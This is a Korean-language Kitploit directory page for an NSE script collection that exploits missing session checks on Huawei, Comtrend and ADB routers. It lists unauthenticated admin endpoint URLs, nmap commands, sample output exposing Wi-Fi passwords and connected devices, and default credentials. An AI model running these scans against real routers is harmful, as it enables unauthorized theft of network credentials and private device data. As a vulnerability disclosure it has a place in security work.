Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
scripts-nse — 라우터에서 정보를 검색하기 위한 일부 NSE 스크립트 | Kitploit
도구/GitHubGitHub/danilabs/scripts-nse
ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb SecurityNetwork SecurityPenetration Testing
GitHubdanilabs/scripts-nse

scripts-nse

라우터에서 정보를 검색하기 위한 일부 NSE 스크립트

저장소 보기
362610년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

무엇인가요?

라우터에서 정보를 검색하기 위한 일부 NSE 스크립트입니다.

이 스크립트들의 작성자는 VicenDominguez입니다. 그는 Huawei에서 0-Day를 발견했으며 저는 다른 두 가지를 위해 수정만 했습니다.

이 스크립트의 작성자는 이 스크립트의 사용에 대해 책임을 지지 않습니다.

#Huawei HG253s v2 Vodafone-Spain은 스페인 고객에게 새로운 Huawei HG253v2 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다.

##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.

  • http://IPhtml_253s/api/ntwk/WlanBasic
  • http://IP/html_253s/api/system/diagnose_internet
  • http://IP/html_253s/api/system/hostinfo?type=ethhost
  • http://IP/html_253s/api/system/hostinfo?type=guesthost
  • http://IP/html_253s/api/system/hostinfo?type=homehost
  • http://IP/html_253s/api/system/hostinfo?type=wifihost
  • http://IP/html_253s/api/system/wizardcfg

##사용법

root@kitploit:~
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefonica-Spain은 스페인 고객에게 새로운 Comtrend VG 8050 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다. 이 버그는 DaniLabs에 의해 발견되었습니다.

##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

##사용법

root@kitploit:~
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spain은 스페인 고객에게 새로운 ADB P.DGA4001N 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다. 이 버그는 DaniLabs에 의해 발견되었습니다.

##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.

  • http://IP/getWifiInfo.jx
  • http://IP/listDevices.jx
  • http://IP/infoApplications.jx

기본 자격 증명은 admin / 1234입니다. ##사용법

root@kitploit:~
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

도구 다운로드